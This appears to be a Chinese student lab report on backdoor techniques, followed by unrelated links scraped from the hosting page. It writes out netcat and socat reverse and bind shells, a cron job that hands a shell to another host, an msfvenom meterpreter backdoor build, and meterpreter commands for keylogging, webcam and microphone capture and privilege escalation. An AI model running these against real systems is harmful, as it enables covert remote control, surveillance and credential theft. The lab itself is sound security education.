20155217《网络对抗》Exp02 后门原理与实践
20155217《网络对抗》Exp02 后门原理与实践
实验要求
使用netcat获取主机操作Shell,cron启动。
使用socat获取主机操作Shell,任务计划启动。
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。
可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
常用后门工具实践
Win获得Linux Shell
- 在Windows下,使用
ipconfig
指令查看本机IP:
windows下用
ncat.exe
打开监听端口ncat.exe -l -p 5217
。Linux下用
nc
指令反弹连接win端口nc 172.20.10.2 5217 -e /bin/sh
。windows下成功获得一个linux shell,可运行任何指令,运行
ls
指令如下。
Linux获得Win Shell
- 在Kali环境下,使用
ifconfig
查看IP。
Linux用
nc
监听端口nc -l -p 5217
。Windows用
ncat.exe
反弹连接Linux端口ncat.exe -e cmd.exe 172.20.10.3 5217
。Linux下看到Windows的命令提示。
使用nc传输数据
Windows下监听
5217
端口ncat.exe -l 5217
。Linux下连接到Windows的
5217
端口nc 172.20.10.2 5217
。建立连接之后,就可传输文件。
使用netcat获取主机操作Shell,cron启动
在Windows系统下监听
5217
端口ncat.exe -l -p 5217
。在Linux环境下,使用
man crontab
指令查看crontab
的帮助文档。从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令
。
用
crontab -e
编辑一条定时任务。在最后一行添加
49 * * * * /bin/netcat 172.20.10.2 5217 -e /bin/sh
。
- 当时间到了22点49时,此时已经获得了Linux的shell,可以输入指令。
使用socat获取主机操作Shell, 任务计划启动
socat
是ncat
的增强版,它使用的格式是socat [options] <address> <address>
,其中两个address
是必选项,而options
是可选项。
socat的基本功能就是建立两个双向
的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
- 在Windows系统下,打开
控制面板->管理工具->任务计划程序
,创建任务,填写任务名称后,新建一个触发器。
- 在
操作->程序
中选择socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5217 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe绑定到端口5217,同时把cmd.exe的stderr重定向到stdout。
- 创建完成之后,点击运行。
- 在Linux环境下输入指令·
socat - tcp:172.20.10.2:5217
,此时可以发现已经成功获得了一个cmd shell
。
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5217 -f exe > 20155217_backdoor.exe
生成后门程序。
通过
nc
指令将生成的后门程序传送到Windows主机上。nc 172.20.10.1 5217 < 20155217_backdoor.exe
,ncat.exe -l 5217 > 20155217_backdoor.exe
在Linux上使用
msfconsole
指令进入msf控制台
- 在msf的命令下输入命令
use exploit/multi/handler
,payload设置命令set payload windows/meterpreter/reverse_tcp
,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口5217。
Linux使用exploit命令开始监听,此时在Win上执行后门程序。
打开win后门程序,此时Linux上已经获得了Windows主机的连接,并且得到了远程控制的shell。
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用
record_mic
指令可以截获一段音频
- 使用
webcam_snap
指令可以使用摄像头进行拍照
- 使用
webcam stream
指令可以使用摄像头进行录像(运行失败)
- 使用
screenshot
指令可以进行截屏
- 使用
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录
- 使用
getuid
指令查看当前用户,使用getsystem
指令进行提权。
基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
后门程序通过邮件发送,并不小心点开了恶意链接。
U盘里的文件不安全,插入电脑将其文件保存在电脑内
浏览不安全的网站,误点危险信息。
下载软件时,后门可能安装在捆绑软件中。
- 例举你知道的后门如何启动起来(win及linux)的方式?
自己不小心点击运行了后门程。
自行篡改注册表,将其设为开机自动运行。
被控端被设置了cron启动,定时循环启动。
被控端被设置了任务计划启动socat,在被控端达到某个条件时程序运行,且此时控制端可自由连接控制被控端。
与其他具有正常功能的程序进行了绑定,在运行正常程序时,连带着运行后门。
后门被设置为成服务,且其名字与系统服务名字类似。
- Meterpreter有哪些给你映像深刻的功能?
获取击键记录能得到很多信息,像什么密码啊、浏览记录啊、聊天记录啊,都非常容易被人窃取到进行分析。
能通过指令获取控制摄像头。
后门程序能迁移到其他正常运行的程序中去,隐藏得很深。
- 如何发现自己有系统有没有被安装后门?
查看注册表、进程、服务等,是否有未知的程序。
下载专门的监控软件进行监控操作系统。
检查防火墙开启的端口和它对应的进程。
实验总结与体会
在使用MSF的时候,非常轻易的就从Win上获取到了许多信息,这个过程是相当爽的。而且通过实验才了解到平常会“忽略”的防火墙原来这么的重要,如果没有多层拦截与防护,电脑不堪一击。另外,win10虽然有很多无语的地方,但本身的安全性还是值得肯定的= =。
20155217《网络对抗》Exp02 后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155211《网络对抗》Exp02 后门原理与实践
20155211<网络对抗>Exp02 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 ( ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 20165221 《网络对抗技术》EXP2:后门原理与实践
20165221 <网络对抗技术>EXP2:后门原理与实践 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
随机推荐
- react native进阶
一.前沿||潜心修心,学无止尽.生活如此,coding亦然.本人鸟窝,一只正在求职的鸟.联系我可以直接微信:jkxx123321 二.项目总结 **||**文章参考资料:1. http://blog ...
- [Sublime-Text] Linux下用Sublime-Text3编译输出Java文件
因为现在在借着经典的书籍巩固一些基础知识,所以会经常跑一些简单的程序,可又不想开庞大的IDE.所以就想试着用Sublime-Text来编译程序,哦,当然如果习惯的话,用 terminal 也可以.其实 ...
- springcloud 入门 4 (rebbon源码解读)
Ribbon: ribbon是springcloud个服务之间调用的一种实现方式:主要提供了客户端的负载均衡.feign集成了Ribbon(下节介绍) 源码分析: 1> 源码入口 @LoadBa ...
- 【转】CentOS 6.6 升级GCC G++ (当前最新版本为v6.1.0) (完整)
原文地址:https://www.cnblogs.com/lzpong/p/5755678.html 我这里是centos7 升级到gcc8.1,过程差不多,参考这篇文章,记录一下. ---原文--- ...
- HTIML5 真的打败了Flash?新测试结果出人意料
[编者按]本文最早发布于 2010 年,通过 Flash 与 HTML5 在 Mac 及 Windows 平台不同浏览器中的测试表现,比较两者的性能并分析背后的原因.虽然是一篇老文,但其客观冷静的分析 ...
- go语言练习:通道、协程
1.通道的简单例子: package main import "fmt" func main() { channel:=make(chan string) //创建了一个通道对象 ...
- ZooKeeper 分布式协调服务介绍
0. 说明 从自己的独立博客迁移,该部分为 Zookeeper分布式协调服务介绍 原文链接 ZooKeeper 指南 1. ZooKeeper 简介 [官方介绍] ZooKeeper 是一种集中式服 ...
- Windows 常识大全【all】
解决电脑卡顿问题 电脑常见技巧大全 电脑运行命令CMD集锦 开启Windows 7系统的“上帝模式” Win7下设置护眼的电脑豆沙绿界面 零基础如何组装电脑?装机之家手把手教您电脑组装教程图解 [Ex ...
- (二十)ArcGIS JS 加载WMTS服务(超图示例)
前言 在前一篇中说到我们可以通过加载WMS服务解决用ArcGIS API加载超图发布的服务,但是WMS服务在加载效率上是低于切片服务的,加上超图的IServer,无力吐槽,所以,在加载速度的要求下,切 ...
- php 微信公众号接入支付宝支付
真是无力吐槽这个需求了,好端端的非要在微信公众号接入支付宝,都知道微信公众号是拒绝支付宝的,屏蔽了支付宝,所以在微信公众号接入支付宝的话就必须手动复制链接跳出微信内置浏览器,强制性打开web浏览器完成 ...